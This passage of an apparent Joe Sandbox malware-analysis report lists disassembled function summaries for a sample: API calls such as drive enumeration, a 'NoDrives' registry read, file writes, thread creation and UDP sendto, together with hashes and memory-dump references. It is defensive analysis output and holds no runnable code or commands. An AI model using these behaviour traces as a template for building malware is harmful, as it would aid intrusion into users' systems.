                                                                                                                                                                                                      • Opcode Fuzzy Hash: a9e600dac57c6bff42fbd44a0ab5cbd0dab53693824f3ca44f5ffdbb74c8a893
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A413A75A0020ADFCB04DF99D884BAFB7B5FF48304F108969E505A7390D778AA91CB95
                                                                                                                                                                                                      Function 0040EB60 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(00000000,service), ref: 0040EC1C
                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EC6B
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 0040EC7F
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 0040EC97
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                      • String ID: service$serviceType
                                                                                                                                                                                                      • API String ID: 1602765415-3667235276
                                                                                                                                                                                                      • Opcode ID: 5f17999700f738b1f8b02f544927b29f5482ea2caa1df498b33a2fd0fcdce1b7
                                                                                                                                                                                                      • Instruction ID: 010777473a756836e58c8d4bedbd534eac8e5d19c37eb4cb5fbe46cee8795b1d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f17999700f738b1f8b02f544927b29f5482ea2caa1df498b33a2fd0fcdce1b7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F416A74A0020ADFDB04CF99C884BAFB7B9BF48304F108969E505B7390D779AE81CB95
                                                                                                                                                                                                      Function 004022C0 Relevance: 10.6, APIs: 7, Instructions: 95COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3168844106-0
                                                                                                                                                                                                      • Opcode ID: 3ac2f8f5af7b0d3c40b8ef892d708a394eff8d7b565022b2108cc4f7acf51177
                                                                                                                                                                                                      • Instruction ID: a453b5b0d0ea6fd4c501cc83d62b7a74cd48d0bc9ee55fa6e36116878b1ddbe7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ac2f8f5af7b0d3c40b8ef892d708a394eff8d7b565022b2108cc4f7acf51177
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D231D1722012059BC710AFB5ED8CAE7B7A8FB44314F04863EE55AD3280DB78A4449BA9
                                                                                                                                                                                                      Function 0040ED01 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(00000000,device), ref: 0040ED7C
                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EDCB
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 0040EDDF
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 0040EDF7
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                      • String ID: device$deviceType
                                                                                                                                                                                                      • API String ID: 1602765415-3511266565
                                                                                                                                                                                                      • Opcode ID: c6fd2f803c2933f412baf75b0cc734dbcdbc8a3f85456721b664ef36854a057b
                                                                                                                                                                                                      • Instruction ID: 82367b585ef85f09a19fbcbd702cec43aacbd83c2379c0e5ae25b899a50ddae9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c6fd2f803c2933f412baf75b0cc734dbcdbc8a3f85456721b664ef36854a057b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1313970A0020ADFCB14CF99D884BEFB7B5FF88304F108969E514A7390D778AA91CB95
                                                                                                                                                                                                      Function 0040EBA1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(00000000,service), ref: 0040EC1C
                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EC6B
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 0040EC7F
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 0040EC97
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                      • String ID: service$serviceType
                                                                                                                                                                                                      • API String ID: 1602765415-3667235276
                                                                                                                                                                                                      • Opcode ID: fbd28e8abd5f6cdc19dfc357c6f3e47e72171285df1c210c36e8075dc31c5cfb
                                                                                                                                                                                                      • Instruction ID: b0af1682f63206834f838cc0e71cdea1734b5e967c65deefb948a4066f0743c7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fbd28e8abd5f6cdc19dfc357c6f3e47e72171285df1c210c36e8075dc31c5cfb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09312874A0420A9FDB04CF99C884BEFB7B5BF48304F108969E615B7390D779AA81CB95
                                                                                                                                                                                                      Function 0040B530 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74fileCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateFileW.KERNEL32(004163E0,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040B5C8
                                                                                                                                                                                                      • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040B5E9
                                                                                                                                                                                                      • FlushFileBuffers.KERNEL32(000000FF), ref: 0040B5F3
                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 0040B5FD
                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(00414FB0,0000003D), ref: 0040B60A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                                                                                                                                                      • String ID: .Wu
                                                                                                                                                                                                      • API String ID: 442028454-3424199868
                                                                                                                                                                                                      • Opcode ID: f5b45801421cf4693db4a952f6c7f3d93a7964b949aee7b1e37d5bd3e27ea16a
                                                                                                                                                                                                      • Instruction ID: a0ca425d267a8141d5e1d1f6c90da30668f0d4feb664184cc2dbb6b4fe126232
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f5b45801421cf4693db4a952f6c7f3d93a7964b949aee7b1e37d5bd3e27ea16a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93312BB4A00208EBCB14DF94DC45FAEB775FB88304F208969E51567390D775AA41CF99
                                                                                                                                                                                                      Function 004077F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71sleepCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Sleep$CacheDeleteEntrywsprintf
                                                                                                                                                                                                      • String ID: %s%s
                                                                                                                                                                                                      • API String ID: 1447977647-3252725368
                                                                                                                                                                                                      • Opcode ID: 0f885536a534958de828f6dadf3c238a14188cbeabebc74b6a6376721a3f9b9c
                                                                                                                                                                                                      • Instruction ID: a96cc5071c69656b1b6f4b00c6699880e4d6530ea1aa1078cf67c052952084b8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f885536a534958de828f6dadf3c238a14188cbeabebc74b6a6376721a3f9b9c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 643116B0C01218DFCB50DFA8DC887EDBBB4BB48304F1085AAE609B6290D7795AC4CF59
                                                                                                                                                                                                      Function 004063E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55registryCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetLogicalDrives.KERNEL32 ref: 004063E6
                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406434
                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406461
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0040647E
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00406427
                                                                                                                                                                                                      • NoDrives, xrefs: 00406458
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                                                                                                                                      • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                                                                                                                                      • API String ID: 2666887985-3471754645
                                                                                                                                                                                                      • Opcode ID: dded7858fb8d287b6bf9178ccf4275851236264e48071ce0b3ae741169170e3e
                                                                                                                                                                                                      • Instruction ID: 87cba227ccd7b938b07588cb79f30f32aa16a0fd6c84a7572e83495dfcaef010
                                                                                                                                                                                                      • Opcode Fuzzy Hash: dded7858fb8d287b6bf9178ccf4275851236264e48071ce0b3ae741169170e3e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D311FCB0E0020A9BDB10CFD0D945BEEBBB4BB08304F118119E615B7280D7B85685CF99
                                                                                                                                                                                                      Function 0040DBE0 Relevance: 9.1, APIs: 6, Instructions: 80threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040DC04
                                                                                                                                                                                                        • Part of subcall function 0040DCD0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040DD10
                                                                                                                                                                                                        • Part of subcall function 0040DCD0: CloseHandle.KERNEL32(?), ref: 0040DD29
                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040DC5F
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040DC9C
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040DCA7
                                                                                                                                                                                                      • DuplicateHandle.KERNEL32(00000000), ref: 0040DCAE
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040DCC2
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2251373460-0
                                                                                                                                                                                                      • Opcode ID: 2e6c4f739912ed2bc0a02cfb396969f5dbba436efce4c3680658a262bb647ab9
                                                                                                                                                                                                      • Instruction ID: 271f69a92097b1b74c70525479ef463fb32d1143369d808ec26f6a45d53993ac
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e6c4f739912ed2bc0a02cfb396969f5dbba436efce4c3680658a262bb647ab9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D31FA74A00208EFDB04DF98D889B9E7BB5EF48314F0085A8E906A7391D774EA95CF94
                                                                                                                                                                                                      Function 00407720 Relevance: 9.1, APIs: 6, Instructions: 65sleepCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Sleep$CountTickrandsrand
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3488799664-0
                                                                                                                                                                                                      • Opcode ID: c4b67ad1fad57f8bcb632e0803aeb8977b8bb7c39f14d193e10d0355081e485a
                                                                                                                                                                                                      • Instruction ID: d526f444081091d18ff5343ef40ffd9a09f2c1e6f6858c3ecb06089bc02b22b2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c4b67ad1fad57f8bcb632e0803aeb8977b8bb7c39f14d193e10d0355081e485a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F21A479E00208FBC704DF60D885AAE7B31AB45304F10C47AE9026B381D679BA80CB56
                                                                                                                                                                                                      Function 00409860 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _allshl_aullshr
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 673498613-0
                                                                                                                                                                                                      • Opcode ID: 676eacc0c821b4ee5133c352ae25f7f86d1fbe8fb33d794599ac5fe58c8be501
                                                                                                                                                                                                      • Instruction ID: 526ada65c8064deb58b6c5f7a60763359622b06b1071bb594fb8502c37df64e6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 676eacc0c821b4ee5133c352ae25f7f86d1fbe8fb33d794599ac5fe58c8be501
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1111F32600618AB8B10EF5EC4426CABBD6EF84361B25C136FC2CDF359D634DA454BD8
                                                                                                                                                                                                      Function 00401200 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106networkCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                                                                                                                                                                                      • htons.WS2_32(?), ref: 00401281
                                                                                                                                                                                                      • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                                                                                                                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                                                                                                                                                      • String ID: pdu
                                                                                                                                                                                                      • API String ID: 2164660128-2320407122
                                                                                                                                                                                                      • Opcode ID: 40dba2aff78ba806bae8a6d526fcd496496bfc60c7e892d92015a678719dcbf9
                                                                                                                                                                                                      • Instruction ID: 05dd75d8116292c76d11c3cc90d45d23dbf78b8bb9632d9a28891a4d74dcab7a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40dba2aff78ba806bae8a6d526fcd496496bfc60c7e892d92015a678719dcbf9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0731B3762083009BC710DF69D880A9BBBF4AFC9714F04457EFD9897381D6349914C7AB
                                                                                                                                                                                                      Function 0040DE90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 0040DEA9
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040DED8
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 0040DEE7
                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 0040DEF4
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                                                                                                                                                      • String ID: .Wu
                                                                                                                                                                                                      • API String ID: 3102160386-3424199868
                                                                                                                                                                                                      • Opcode ID: bb7e0bdf7f07b64480a2601e76dd0e203c57d6389b493651e08ccb706d318709
                                                                                                                                                                                                      • Instruction ID: ac11750a047aba6f79e7b8cc85f80e728fdbf261864cbbb5073f4aff0768140e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb7e0bdf7f07b64480a2601e76dd0e203c57d6389b493651e08ccb706d318709
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65115E74D00208EBDB08DF94D984A9DBB75FF48309F1081A9E806AB341D734EE94DB89
                                                                                                                                                                                                      Function 00401330 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42synchronizationCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetEvent.KERNEL32(?,00000000,?,0040154C,00000000), ref: 00401346
                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401352
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040135C
                                                                                                                                                                                                        • Part of subcall function 0040AB60: HeapFree.KERNEL32(?,00000000,00402612,?,00402612,?), ref: 0040ABBB
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                                                                                                                                                      • String ID: pdu$.Wu
                                                                                                                                                                                                      • API String ID: 309973729-3067427362
                                                                                                                                                                                                      • Opcode ID: b5e20e1ff81c8238d4906aefd24b36edb0459e4a4963a0916b72258a76a9c2c1
                                                                                                                                                                                                      • Instruction ID: d5c9189d357da9e52bb83819b3173fb4210b6dfc4c93b70417a9898bc2e8bd9b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b5e20e1ff81c8238d4906aefd24b36edb0459e4a4963a0916b72258a76a9c2c1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D0186765003109BCB20AF66ECC4E9B7779AF48711B044679FD056B396C738E85087A9
                                                                                                                                                                                                      Function 00406360 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetDriveTypeW.KERNEL32(?c@), ref: 0040636D
                                                                                                                                                                                                      • QueryDosDeviceW.KERNEL32(?c@,?,00000208), ref: 004063AC
                                                                                                                                                                                                      • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 004063C4
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DeviceDriveQueryType
                                                                                                                                                                                                      • String ID: ?c@$\??\
                                                                                                                                                                                                      • API String ID: 1681518211-744975932
                                                                                                                                                                                                      • Opcode ID: f7d2f09f959af449ec867411dc7ba934a04d8b9c93c7b8ac7040ad7b5d155416
                                                                                                                                                                                                      • Instruction ID: e6efffa98ab35b62633249d18dd791fc9affcc5f03e1fdb0b50d0aac4f7d71b0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f7d2f09f959af449ec867411dc7ba934a04d8b9c93c7b8ac7040ad7b5d155416
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6101F474A4021CEBCB20CF55DD497DD7774AB04714F00C0BAAA06A7280D6759FD5CF99
                                                                                                                                                                                                      Function 00401820 Relevance: 7.6, APIs: 5, Instructions: 116COMMON
